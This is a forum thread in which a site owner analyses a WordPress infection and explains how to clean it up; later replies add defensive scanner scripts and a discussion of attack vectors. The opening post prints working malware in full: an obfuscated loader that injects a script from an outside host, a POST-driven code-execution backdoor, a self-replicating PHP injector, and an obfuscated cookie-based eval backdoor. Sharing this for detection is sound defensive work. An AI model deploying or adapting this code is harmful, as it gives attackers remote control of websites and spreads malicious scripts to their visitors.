Wordpress Hack [Replicating Malware with redirection + not so easy fix]

nesym

Active member
Babiato Lover
Sep 8, 2019
365
191
43
Why do I post this?

Educational purpose. If anyone stumbles upon something similar, they will know how to deal with it in the best way possible.

Why did I get malware/hacked in the first place?

No one to blame but yourself. You decide what you are going to put on your web server and only you have the power to do so. Most likely poor hardening, configuration, outdated plugins/software, or malicious file uploaded directly by you.

Another good answer to this is:
Because hackers want to achieve something. From SEO to phishing/scam/steal data/just do harm/for fun because they can.

Ok, so many of you have been here. One of my projects just got defaced. That's the risk of using Wordpress and using nulled themes and plugins. To be honest I normally scan the files before I upload them to the server, but lately I was just too bold because I wasn't finding anything suspicious since I'm using only Babiato and uploaded them straight to the server. Even though Babiato has its good reputation and members here always help each other (they also helped me many times), there is always the option that one out of 1000 uploaders decides to put something funny in his uploads.

How to clean the hack?

1. Backup the hacked web server as is (with the malware)
2. Backup the DB files
3. Create a virtual machine
4. Sync the server to the virtual machine
5. Nuke the god damn server to the ground
6. Forbid its access to the WWW and scan the virtual machine using tools like clamAV, aibolit, wordfence and
7. Clean all the folders and files manually by removing them and removing strings in the code
8. Clean the database manually
9. Set the new server up from the ground
10. Harden the server
11. Change all your db names and passwords
12. Make an rsync backup every week and keep it somewhere on your PC

What exactly is that malware doing?

It has a php/js file that executes the malware. Normally it's not a rootkit but just a normal malware that spreads across all folders that the www-data user has access to in the main public_html folder.

In my case, I think what installs the functions of the malware was masked as an .ico file;
then it shits all over your JavaScript, PHP and also JSON files and tries to replicate its malicious code.

Here is an example of how it looks.

Redirection to:

The part that you have to GREP in JS/PHP:

Code:
Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,111,114,101,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,111,114,101,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = 
String.fromCharCode(104,116,116,112,115,58,47,47,115,116,111,114,101,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

Decoded it looks like this:

JavaScript:
Element.prototype.appendAfter = function(element) {
    element.parentNode.insertBefore(this, element.nextSibling);
}, false;
(function() {
    var elem = document.createElement("script");
    elem.type = "text/javascript";
    elem.src = "https://store.dontkinhooot.tw/stat.js";
    elem.appendAfter(document.getElementsByTagName("script")[0]);
    elem.appendAfter(document.getElementsByTagName("head")[0]);
    document.getElementsByTagName("head")[0].appendChild(elem);
})();
Element.prototype.appendAfter = function(element) {
    element.parentNode.insertBefore(this, element.nextSibling);
}, false;
(function() {
    var elem = document.createElement("script");
    elem.type = "text/javascript";
    elem.src = "https://store.dontkinhooot.tw/stat.js";
    elem.appendAfter(document.getElementsByTagName("script")[0]);
    elem.appendAfter(document.getElementsByTagName("head")[0]);
    document.getElementsByTagName("head")[0].appendChild(elem);
})();
var isIE=!1,isEdge=!1;

Check your Wordpress for files like wp-stream.php and wp-xmlrpc.php (there shouldn't be any wp-xmlrpc.php, only xmlrpc.php in a default wp install)

wp-stream.php content

PHP:
<?php  if(isset($_POST['lt']) && md5($_POST['lt']) == base64_decode("MDIzMjU4YmJlYjdjZTk1NWE2OTBkY2EwNTZiZTg4NWQ=") ) {$lt = base64_decode($_POST['a']);file_put_contents('lte_','<?php '.$lt);$lt='lte_';if(file_exists($lt)){include($lt);unlink($lt);}} ?>

Decoded it looks like this:

PHP:
<?php
if (isset($_POST['lt']) && md5($_POST['lt']) == '023258bbeb7ce955a690dca056be885d') {
    $lt = base64_decode($_POST['a']);
    file_put_contents('lte_', '<?php ' . $lt);
    $lt = 'lte_';
    if (file_exists($lt)) {
        include($lt);
        unlink($lt);
    }
}
?>

I also noticed this not long ago, they may be connected:
(This you can find in your home page when looking at the view page source)


HTML:
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">

<a style="font-size:18px;" href="https://downapkmod.com/" title="https://downapkmod.com/">https://downapkmod.com/</a>,

<a style="font-size:18px;" href="https://apkcop.com/" title="https://apkcop.com/">https://apkcop.com/</a>

</div>

lte_ content
Code:
<?php
ini_set('max_execution_time', '300');
ini_set('memory_limit', '-1');

$files = array();
$b = "/../../../../../../../../"; // unused
$l = "/";
// Pass 1: every .js file below DOCUMENT_ROOT
$it = new RecursiveDirectoryIterator($_SERVER['DOCUMENT_ROOT']);
$display = Array ( 'php' );
$search = Array('.js');
$files_ar = array();

foreach(new RecursiveIteratorIterator($it) as $file)
{
    if (strpos($file->getFilename(),'.js') == true || strpos($file->getFilename(),'.js') == true)
    {
        $q = strposa($file->getFilename(), $search);
        if($q != ""){
            array_push($files,$file->getPathname());
        }
    }
}
foreach($files as $onefile) {
    make_work($onefile);
}

// Pass 2: climb up to 7 directories above DOCUMENT_ROOT (other sites on the same
// account/user) and repeat; $files is never reset, so earlier hits are re-processed
for ($i = 1; $i < 8; $i++) {
    $l .= "../";
    try {
        $it = new RecursiveDirectoryIterator($_SERVER['DOCUMENT_ROOT'].$l);
        $display = Array ( 'php' );
        $search = Array('.js');
        $files_ar = array();

        foreach(new RecursiveIteratorIterator($it) as $file)
        {
            if (strpos($file->getFilename(),'.js') == true || strpos($file->getFilename(),'.js') == true)
            {
                $q = strposa($file->getFilename(), $search);
                if($q != ""){
                    array_push($files,$file->getPathname());
                }
            }
        }
        foreach($files as $onefile) {
            make_work($onefile);
        }
    } catch (Exception $e) {
    }
}

// Returns the needles found in $haystack joined with "|", or "" when none match
function strposa($haystack, $needle, $offset=0) {
    if(!is_array($needle)) $needle = array($needle);
    $stroke = "";
    foreach($needle as $query) {
        if(strpos($haystack, $query, $offset) !== false) { $stroke .= $query."|";}
    }
    return $stroke;
}

// Prepends the obfuscated loader to a file unless a marker is already present.
// The marker it looks for decodes to "for.dontkinhooot.tw" while the loader it writes
// decodes to "store.dontkinhooot.tw", so the check never matches its own payload and a
// fresh copy is prepended on every run (which is why infected files carry several copies).
function make_work($f){
    $g = file_get_contents($f);

    if (strpos($g, '102,111,114,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119') !== false) {

    } else {
        $l2 = "Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,111,114,101,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();";
        $g = file_get_contents($f);
        $g = $l2.$g;
        @system('chmod 777 '.$f); // makes the file world-writable so later runs can still write it
        @file_put_contents($f,$g);
        echo $f."<br />";
    }
}

randomstring.php

Code:
<?php
$vrtna = '90b_xpdt*l63k8#yancofsrgmuvH72451\'ei-';$umcear = Array();$umcear[] = $vrtna[27].$vrtna[8];$umcear[] = $vrtna[18].$vrtna[22].$vrtna[34].$vrtna[16].$vrtna[7].$vrtna[34].$vrtna[3].$vrtna[20].$vrtna[25].$vrtna[17].$vrtna[18].$vrtna[7].$vrtna[35].$vrtna[19].$vrtna[17];$umcear[] = $vrtna[29].$vrtna[10].$vrtna[18].$vrtna[32].$vrtna[10].$vrtna[31].$vrtna[2].$vrtna[34].$vrtna[36].$vrtna[1].$vrtna[10].$vrtna[31].$vrtna[18].$vrtna[36].$vrtna[30].$vrtna[31].$vrtna[11].$vrtna[29].$vrtna[36].$vrtna[13].$vrtna[13].$vrtna[18].$vrtna[30].$vrtna[36].$vrtna[30].$vrtna[0].$vrtna[11].$vrtna[30].$vrtna[1].$vrtna[29].$vrtna[20].$vrtna[29].$vrtna[29].$vrtna[13].$vrtna[28].$vrtna[10];$umcear[] = $vrtna[14];$umcear[] = $vrtna[18].$vrtna[19].$vrtna[25].$vrtna[17].$vrtna[7];$umcear[] = $vrtna[21].$vrtna[7].$vrtna[22].$vrtna[3].$vrtna[22].$vrtna[34].$vrtna[5].$vrtna[34].$vrtna[16].$vrtna[7];$umcear[] = $vrtna[34].$vrtna[4].$vrtna[5].$vrtna[9].$vrtna[19].$vrtna[6].$vrtna[34];$umcear[] = $vrtna[21].$vrtna[25].$vrtna[2].$vrtna[21].$vrtna[7].$vrtna[22];$umcear[] = $vrtna[16].$vrtna[22].$vrtna[22].$vrtna[16].$vrtna[15].$vrtna[3].$vrtna[24].$vrtna[34].$vrtna[22].$vrtna[23].$vrtna[34];$umcear[] = $vrtna[21].$vrtna[7].$vrtna[22].$vrtna[9].$vrtna[34].$vrtna[17];$umcear[] = $vrtna[5].$vrtna[16].$vrtna[18].$vrtna[12];foreach ($umcear[8]($_COOKIE, $_POST) as $mcysgb => $slevav){function ytmnrg($umcear, $mcysgb, $cbodj){return $umcear[7]($umcear[5]($mcysgb . $umcear[2], ($cbodj / $umcear[9]($mcysgb)) + 1), 0, $cbodj);}function etbln($umcear, $uvrzj){return @$umcear[10]($umcear[0], $uvrzj);}function jvjpux($umcear, $uvrzj){$mltsule = $umcear[4]($uvrzj) % 3;if (!$mltsule) {$kbjfl = $umcear[1]; $wtmzk = $kbjfl("", $uvrzj[1]($uvrzj[2]));$wtmzk();exit();}}$slevav = etbln($umcear, $slevav);jvjpux($umcear, $umcear[6]($umcear[3], $slevav ^ ytmnrg($umcear, $mcysgb, $umcear[9]($slevav))));}


To the so called hackers:

Annoying I admit... you now force me to use docker for every single website installation and find other ways to protect myself.

To the people that got hacked:

Try to share what you got, how you think you got it, but don't insist and blame someone if you don't have the evidence. Sharing helps others protect against similar attacks and figuring out how they got hacked in the first place.

PS: I found the core of the code before it deleted itself (have my ways) but I am not publishing it because it can be used the other way around.

test edit because I have some error when editing
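The "grep for the injected string" and "remove strings in the code" steps from the post, as an added example that is not part of the original post and not the author's own tooling. It finds the loader quoted above in .js/.php/.json/.html files, decodes the String.fromCharCode() calls so the loaded hostname becomes readable, strips every prepended copy (the lte_ code checks for a marker that never matches its own payload, so files collect several copies), and flags files with the write-include-delete shape of wp-stream.php. The directory layout, the dropper stand-in and the file contents are constructed for the demo.

```python
"""Find, decode and strip the injected script loader from a WordPress tree."""
import re
import tempfile
from pathlib import Path

# String.fromCharCode(n, n, ...) as used by the loader to hide its strings
CHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([0-9]+(?:\s*,\s*[0-9]+)*)\s*\)")

# One copy of the loader: prototype patch followed by the IIFE that creates the <script>
LOADER_RE = re.compile(
    r"Element\.prototype\.appendAfter\s*=\s*function\(element\)\s*\{element\.parentNode"
    r"\.insertBefore\(this,\s*element\.nextSibling\);\},\s*false;"
    r"\(function\(\)\s*\{.*?\}\)\(\);",
    re.DOTALL,
)

# Calls the dropper combines: write POSTed code to a file, include it, delete it
DROPPER_MARKERS = ("$_POST", "file_put_contents(", "include(", "unlink(")

SCAN_SUFFIXES = {".js", ".php", ".json", ".html"}


def decode_charcodes(text):
    """Replace every String.fromCharCode(...) call with the decoded string literal."""
    return CHARCODE_RE.sub(
        lambda m: '"' + "".join(chr(int(c)) for c in m.group(1).split(",")) + '"', text
    )


def loader_hosts(text):
    """Hostnames assigned to elem.src by injected loaders, after decoding."""
    decoded = decode_charcodes(text)
    return sorted(set(re.findall(r'elem\.src\s*=\s*"https?://([^/"]+)', decoded)))


def strip_loader(text):
    """Remove every copy of the loader; returns (cleaned_text, copies_removed)."""
    return LOADER_RE.subn("", text)


def looks_like_dropper(text):
    """Cheap heuristic for the write-include-delete pattern of wp-stream.php."""
    return all(marker in text for marker in DROPPER_MARKERS)


def scan_file(path):
    text = path.read_text(errors="replace")
    copies = len(LOADER_RE.findall(text))
    return {
        "copies": copies,
        "hosts": loader_hosts(text) if copies else [],
        "dropper": looks_like_dropper(text),
    }


def scan_tree(root):
    """Map relative path -> finding for every suspicious file under root."""
    root = Path(root)
    findings = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            result = scan_file(path)
            if result["copies"] or result["dropper"]:
                findings[path.relative_to(root).as_posix()] = result
    return findings


# Constructed sample: the loader exactly as quoted in the post, prepended twice to a
# harmless one-line script, plus a constructed stand-in for the dropper that only
# writes a fixed string (it does not take code from the request).
SAMPLE_LOADER = (
    "Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;"
    "(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); "
    "elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); "
    "elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,111,114,101,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119,47,115,116,97,116,46,106,115);"
    "elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);"
    "elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);"
    "document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();"
)
CLEAN_JS = "var isIE=!1,isEdge=!1;\n"
SAMPLE_DROPPER = (
    "<?php /* constructed sample */ if(isset($_POST['lt'])){file_put_contents('lte_','x');"
    "include('lte_');unlink('lte_');}"
)


def demo():
    """Build a tiny WordPress-like tree, scan it, clean the infected file, report."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        theme = root / "wp-content" / "themes" / "x"
        theme.mkdir(parents=True)
        infected = theme / "app.js"
        infected.write_text(SAMPLE_LOADER * 2 + CLEAN_JS)
        (root / "wp-stream.php").write_text(SAMPLE_DROPPER)
        (root / "index.php").write_text("<?php echo 'ok';\n")

        findings = scan_tree(root)
        cleaned, removed = strip_loader(infected.read_text())
        infected.write_text(cleaned)
        return {
            "findings": findings,
            "removed": removed,
            "restored": infected.read_text() == CLEAN_JS,
        }


if __name__ == "__main__":
    print(demo())
```

Run it against a copy of the backup, not the live server: `scan_tree` only reports, and `strip_loader` rewrites nothing by itself, so you can review the findings (and the decoded hosts) before deciding which files to clean and which to restore from a known-good copy. The dropper heuristic is deliberately loose; expect to read each flagged .php file.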
 

underwater

Active member
Nov 26, 2020
256
63
28
Thank you for this nice detailed guide. I was nervous to read the title earlier.
 

Mscv50

! 𝖎'𝖒 𝖜𝖆𝖙𝖈𝖍𝖎𝖓𝖌 𝖞𝖔𝖚 !
Babiato Lover
GiveAway Master
Trusted Uploader
Jan 10, 2020
3,712
18,802
113
🦇The Dark Night🦇
The infected files downloaded from Babiato?
Please share here more info about it so the admins can cure or ban or....
 

MrSam_1

Well-known member
Administrative
Trusted Seller
Dec 1, 2018
23,638
26,971
120
The infected files downloaded from Babiato?
Please share here more info about it so the admins can cure or ban or....
Possibly The Plus Addons for Elementor hack from the other day maybe?
 

hellearth

Active member
Aug 19, 2020
365
113
43
How to clean the hack?

1. Backup the hacked web server as is (with the malware)
2. Backup the DB files
3. Create a virtual machine
4. Sync the server to the virtual machine
5. Nuke the god damn server with the ground
6. Forbid it's access to the WWW and scan the virtual machine using tools like clamAV, aibolit, wordfence and
7. Clean all the folders and files manually by removing them and removing strings in the code
8. Clean the database manually
9. Set the new server from the ground up
10. Hardening the server
11. Change all your db names and passwords
12. Make an rsync backup every week and keep it somewhere on your PC
This is a complete guide but not everyone can do it. It would be nice if anyone shared their documents
 

Saint Gabriel

Well-known member
Jan 3, 2020
2,998
3,049
113
I think if your host has Imunify 360 installed in cpanel, it nullifies and removes malware. Works for me.
 

sunmughan

Active member
Banned User
Dec 31, 2019
238
159
43
CDN
codeair.in
Informative post and a really good article to read peacefully. Sometimes, a good hosting provider can play the role itself by kicking malware automatically through its scan.
 

MrSam_1

Well-known member
Administrative
Trusted Seller
Dec 1, 2018
23,638
26,971
120
Ok, so many of you have been here. One of my projects just got defaced. That's the risk of using Wordpress and using nulled themes and plugins.
I'm using only Babiato and uploaded them straight to the server. Even though Babiato has it's good reputation and members here always helped each other (also helped me many times) there is always the option that one out of 1000 uploaders decides to put something funny in his uploads.

For these 2 statements allow me to disagree. A couple of days ago I found this specific injection on 3 different servers.
All of them had legit themes and plugins, not even one nulled. Can you explain it before pointing fingers?
 

phineas

Active member
Trusted Uploader
Jul 5, 2018
138
177
43
Maybe, maybe not.

But my point is more that even only using legit purchased licenced plugins/themes and running security such as wordfence doesn't leave you immune from attack as the events of this week have proven.

This. Not just nulled plugins get malware - others simply don't get security updates or have an undisclosed security bug, even official ones... WordPress has this downside, but I think that with good monitoring (wordfence for modified files for example), or as stated in the post, using docker containers or individual cPanel accounts will make this hard to spread between your websites :)
 

Mscv50

! 𝖎'𝖒 𝖜𝖆𝖙𝖈𝖍𝖎𝖓𝖌 𝖞𝖔𝖚 !
Babiato Lover
GiveAway Master
Trusted Uploader
Jan 10, 2020
3,712
18,802
113
🦇The Dark Night🦇
Maybe, maybe not.
But my point is more that even only using legit purchased licenced plugins/themes and running security such as wordfence doesn't leave you immune from attack as the events of this week have proven.

Totally agree with you and like @slvrsteele post above yours, that's what i really want to say to the Op.
 

nesym

Active member
Babiato Lover
Sep 8, 2019
365
191
43
For these 2 statements allow me to disagree. Couple days ago found this specific injection on 3 different servers.
All of them had legit themes and plugins not even one nulled. Can you explain it before pointing fingers?

Try not to take it personally, please. I am not trying to attack anyone. Actually I'm thankful for everything I got out of the Babiato forum and I myself love to contribute as much as I can. If you read my post carefully enough you'll see I'm not pointing fingers. People describe me as a very rational and logical person and I tend to agree. My only motive here is to raise attention and see if other members have similar problems. Start a discussion, hopefully one that will be beneficial for everyone. With all respect to those people who share resources, their time and dedication. I very well understand the risks and that your server can be compromised from the outside, even though that's very unlikely when you take the right measures.
 

nesym

Active member
Babiato Lover
Sep 8, 2019
365
191
43
Possibly The Plus Addons for Elementor hack from the other day maybe?

That's possible but I believe not. I only had that plugin on a single website and changed strings and names so no one would actually suspect it's that exact plugin. I even have a custom version of Elementor and others, so I doubt an automated attack would happen. Also most of the countries outside of my region are banned from accessing sensitive content. You have to know how I changed those plugin strings in order to make use of the attack. For example, if someone was looking for "Elementor" he wouldn't find a single line of code in my code containing that string. It goes the same for every other plugin. It costs me extra effort but helps me improve security. Also, anyone, please don't ask for a tutorial on this, just take it as is.
 

MrSam_1

Well-known member
Administrative
Trusted Seller
Dec 1, 2018
23,638
26,971
120
I wasn't taking it personally, don't get me wrong. But everyone always blames the nulled things. They might be right probably 50% of the time. But no one thinks of lazy or rookie developers that try to get on the front page for a buck or two, or of those complicated scripts that display a simple date and hour across 50 files of php code.
Making mistakes as a developer is human and some learn from their mistakes and improve while others just don't care and keep going. Some just think that aligning 3 lines of code makes them developers without any knowledge of coding safety practice or code security.

But every single end user out there is blaming the nulled versions of those scripts and it's not fair.
 

Mscv50

! 𝖎'𝖒 𝖜𝖆𝖙𝖈𝖍𝖎𝖓𝖌 𝖞𝖔𝖚 !
Babiato Lover
GiveAway Master
Trusted Uploader
Jan 10, 2020
3,712
18,802
113
🦇The Dark Night🦇
Deleted? why?
Brothers, I am not attacking anyone on here! I was just curious about which files get infected, that's all.
Passion for technology led this 50-year-old man to be an expert in many IT fields :cool:
 

MrSam_1

Well-known member
Administrative
Trusted Seller
Dec 1, 2018
23,638
26,971
120
It was too big and too direct. Sorry for that.

If you wanna see the patterns of an attack then check the file timestamps for last modified and sync them with the error and access log for that period of time. On one of the servers I was talking about, the attacker tried for hours to find a flaw and found a way to use the update option of wp-admin.
185.212.129.205 - - [10/Mar/2021:11:58:28 +0100] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 561878

The most used attack is scanning the users through xmlrpc using the [login] request and trying to bruteforce the login.
Another common attack was using the revslider exploit (I didn't try lately so I don't know if it still works, but I still see scans for revslider in server logs).
There are many plugins/themes/scripts with well-known flaws and 0-day critical flaws, and that's why I always say to check your used plugins/themes against a vulnerability database.
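The timestamp-and-log correlation described above, as an added example that is not part of the post and not MrSam_1's own script. It parses "combined"-style access-log lines, flags the three request types named in the post (plugin upload through wp-admin/update.php, xmlrpc.php requests, revslider scans), counts them per client address, and for each recently modified file lists the flagged requests that arrived in the minutes before its mtime. The log lines (RFC 5737 documentation addresses), file paths and mtimes are constructed.

```python
"""Correlate suspicious access-log requests with recently modified files."""
import re
from collections import Counter
from datetime import datetime, timedelta, timezone

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r"(?P<status>\d{3}) (?P<size>\d+|-)"
)

# Request shapes named in the post; the first matching rule wins
RULES = (
    ("plugin upload via wp-admin", re.compile(r"^/wp-admin/update\.php\?action=upload-plugin")),
    ("xmlrpc.php request", re.compile(r"^/xmlrpc\.php")),
    ("revslider probe", re.compile(r"revslider", re.IGNORECASE)),
)


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"],
        "status": int(m["status"]),
    }


def flag_requests(lines):
    """Parsed requests that match a rule, each annotated with the rule name."""
    flagged = []
    for line in lines:
        req = parse_line(line)
        if req is None:
            continue
        for reason, pattern in RULES:
            if pattern.search(req["path"]):
                flagged.append({**req, "reason": reason})
                break
    return flagged


def correlate(flagged, modified, window=timedelta(minutes=5)):
    """For each (path, mtime), the flagged requests that arrived within `window` before it."""
    result = {}
    for path, mtime in modified:
        hits = [
            (r["ip"], r["reason"], int((mtime - r["ts"]).total_seconds()))
            for r in flagged
            if timedelta(0) <= mtime - r["ts"] <= window
        ]
        result[path] = sorted(hits, key=lambda h: h[2])
    return result


# Constructed sample log (same date as the line quoted in the post, documentation IPs)
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2021:11:40:01 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415',
    '203.0.113.5 - - [10/Mar/2021:11:40:02 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415',
    '198.51.100.7 - - [10/Mar/2021:11:45:10 +0100] "GET /wp-content/plugins/revslider/temp/x.php HTTP/1.1" 404 196',
    '203.0.113.5 - - [10/Mar/2021:11:58:28 +0100] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 561878',
    '192.0.2.9 - - [10/Mar/2021:12:01:00 +0100] "GET /about/ HTTP/1.1" 200 8123',
]

# Constructed "last modified" timestamps, as `find -newermt` or `stat` would report them
CET = timezone(timedelta(hours=1))
SAMPLE_MODIFIED = [
    ("wp-stream.php", datetime(2021, 3, 10, 11, 58, 31, tzinfo=CET)),
    ("wp-content/themes/x/app.js", datetime(2021, 3, 10, 11, 59, 2, tzinfo=CET)),
    ("wp-content/uploads/2021/03/photo.jpg", datetime(2021, 3, 10, 9, 0, 0, tzinfo=CET)),
]


def demo():
    flagged = flag_requests(SAMPLE_LOG)
    return {
        "flagged": len(flagged),
        "by_ip": dict(Counter(r["ip"] for r in flagged)),
        "correlated": correlate(flagged, SAMPLE_MODIFIED),
    }


if __name__ == "__main__":
    for path, hits in demo()["correlated"].items():
        print(path, hits or "no flagged request in window")
```

On a real server feed `flag_requests` the access log lines and `correlate` the output of `find /path/to/docroot -newermt '<date>' -type f -printf '%P %T@\n'` converted to datetimes; the benign photo.jpg entry shows the point, which is that a modified file with no flagged request shortly before it is less interesting than one that follows a plugin upload by a few seconds.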
 

huda98

New member
Apr 4, 2021
21
21
3
ES.Java
That's possible but I believe not. I only had that plugin on a single website and changed strings and names so no one would actually suspect it's that exact plugin. I even have a custom version of Elementor and others so I doubt an automated attack would happen. Also most of the countries outside of my region are banned from accessing sensitive content. You have to know how I changed those plugin strings in order to make use of the attack. For example if someone was looking for "Elementor" he wouldn't find a single line of code in my code containing that string. It goes the same for every other plugin. It costs me extra efforts but helps me improve security. Also anyone please don't ask for a tutorial on this just take it as is.
How did you hide that string? Did you manually change the plugin code or something else?
 

untergrund

New member
Feb 12, 2020
1
0
3
I had a similar case where an additional .htaccess file was copied into each folder. In the public directory were a lot of changed and new files. It took a bit of time, but now the site is running normally again. To remove all the .htaccess files I ran a shell script. This saved a lot of work. The rest I had to clean manually.

The problem is that I haven't figured out where the malware came from. Especially because I hadn't changed or updated anything on the site for a few months.
 

Dawid

New member
Jun 6, 2022
0
0
0
Based on my experience:

1st, if I download from a nulled web, I run it locally in my sandbox; after checking and cleaning, I push it to the server or host.
 
